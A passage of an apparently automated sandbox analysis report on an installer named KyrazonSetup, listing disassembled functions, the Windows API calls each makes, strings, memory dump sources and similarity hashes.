                                                                                      • GetShortPathNameA.KERNEL32(?,00448A00,00000400), ref: 00405C66
                                                                                      • wsprintfA.USER32 ref: 00405C84
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00448A00,C0000000,00000004,00448A00,?,?,?,?,?), ref: 00405CBF
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                                                                                      • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,00448200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                                                                                        • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,00489000,80000000,00000003), ref: 00405B3D
                                                                                        • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %s=%s$[Rename]
                                                                                      • API String ID: 2171350718-1727408572
                                                                                      • Opcode ID: f91431428f4f9cf126320bd5d83c4c3157d753f908e71048d70342efb9ce6d80
                                                                                      • Instruction ID: e673f0d6058c791d0c25712d379d652ad09bbbe08baf3ed575ce0f5f839497a3
                                                                                      • Opcode Fuzzy Hash: f91431428f4f9cf126320bd5d83c4c3157d753f908e71048d70342efb9ce6d80
                                                                                      • Instruction Fuzzy Hash: 1C31D331200F15ABD2207B659D49F6B3A5CDF46754F14453FBA01B62D2EABCA8018E6D
                                                                                      Function 004050C7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                                                                      • lstrlenA.KERNEL32(004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                                                                      • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,004030F7,004030F7,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,00000000,00422028,74DF23A0), ref: 00405123
                                                                                      • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\), ref: 00405135
                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                      • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\
                                                                                      • API String ID: 2531174081-2777811413
                                                                                      • Opcode ID: d21e6d514fbfc4abde305c1ef67b874bd8ab4c643857dcd361e5a81f6eb4b346
                                                                                      • Instruction ID: 5f823985bcc8b2cdd8f6641b2ca88111799b2924c5ea7b151e34c18a46508a3e
                                                                                      • Opcode Fuzzy Hash: d21e6d514fbfc4abde305c1ef67b874bd8ab4c643857dcd361e5a81f6eb4b346
                                                                                      • Instruction Fuzzy Hash: A5216071D00618BADB119FA5DD84ADFBFB9EB09354F14807AF944B6291C7398E408F68
                                                                                      Function 004040A6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                                                                                      • GetSysColor.USER32(00000000), ref: 00404101
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040410D
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404119
                                                                                      • GetSysColor.USER32(?), ref: 0040412C
                                                                                      • SetBkColor.GDI32(?,?), ref: 0040413C
                                                                                      • DeleteObject.GDI32(?), ref: 00404156
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404160
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2320649405-0
                                                                                      • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                                                      • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                                                                                      • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                                                                                      • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                                                                                      Function 00404992 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                                                                                      • GetMessagePos.USER32 ref: 004049B5
                                                                                      • ScreenToClient.USER32(?,?), ref: 004049CF
                                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$Send$ClientScreen
                                                                                      • String ID: f
                                                                                      • API String ID: 41195575-1993550816
                                                                                      • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                      • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                                                                                      • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                      • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                                                                                      Function 00401D9B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00401D9E
                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                                                                      • CreateFontIndirectA.GDI32(00414418), ref: 00401E20
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                      • String ID: MS Shell Dlg
                                                                                      • API String ID: 3808545654-76309092
                                                                                      • Opcode ID: f592c05a4aa41413d76682ba287349174b279d32fcdcd62327a061fd3fecde38
                                                                                      • Instruction ID: 8eb8a613e517b0ada4c927cb5962fe8d64921dcd133049690b029bc7932b5da1
                                                                                      • Opcode Fuzzy Hash: f592c05a4aa41413d76682ba287349174b279d32fcdcd62327a061fd3fecde38
                                                                                      • Instruction Fuzzy Hash: 1B017571944240AFE7005BB4BE59BDA3FB49B99705F10843AF141B61E2CA7904458F2D
                                                                                      Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                                                                      • MulDiv.KERNEL32(04C85BD4,00000064,04C85BD8), ref: 00402CC2
                                                                                      • wsprintfA.USER32 ref: 00402CD2
                                                                                      • SetWindowTextA.USER32(?,?), ref: 00402CE2
                                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                                                                                      Strings
                                                                                      • verifying installer: %d%%, xrefs: 00402CCC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                      • String ID: verifying installer: %d%%
                                                                                      • API String ID: 1451636040-82062127
                                                                                      • Opcode ID: d562dd5390d3a0e7d9675bc1a4fc8cfd357df08b0b8af2f41c950853e011aaf8
                                                                                      • Instruction ID: 3314197b3f9f5dc33a1332829412108c9be2eec106a00c297f207c8eb8ab8f63
                                                                                      • Opcode Fuzzy Hash: d562dd5390d3a0e7d9675bc1a4fc8cfd357df08b0b8af2f41c950853e011aaf8
                                                                                      • Instruction Fuzzy Hash: AD014F70640208FBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB999558F59
                                                                                      Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                                                                      • GlobalFree.KERNEL32(?), ref: 004027EB
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                      • String ID:
                                                                                      • API String ID: 2667972263-0
                                                                                      • Opcode ID: adc14c698ea9f6e2abac3a03bd9f9e1104f5e15cfd0a5a3d471f2bb4dcc3505b
                                                                                      • Instruction ID: 8a438bf96df610f2c0569d5b63dfc02eada2097e819d04fb11786cc16195dd52
                                                                                      • Opcode Fuzzy Hash: adc14c698ea9f6e2abac3a03bd9f9e1104f5e15cfd0a5a3d471f2bb4dcc3505b
                                                                                      • Instruction Fuzzy Hash: 37219F71800124BBDF217FA5CE49E9E7B79AF09364F14423AF510762E1CB7959009FA8
                                                                                      Function 0040620A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,0047B000,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                                                                      • CharNextA.USER32(?,0047B000,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                                                                      • CharPrevA.USER32(?,?,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000495000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1920055468.00000000004E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: *?|<>/":
                                                                                      • API String ID: 589700163-165019052
                                                                                      • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                                                      • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                                                                                      • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                                                                                      • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                                                                                      Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?), ref: 00401D45
                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D52
                                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000487000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
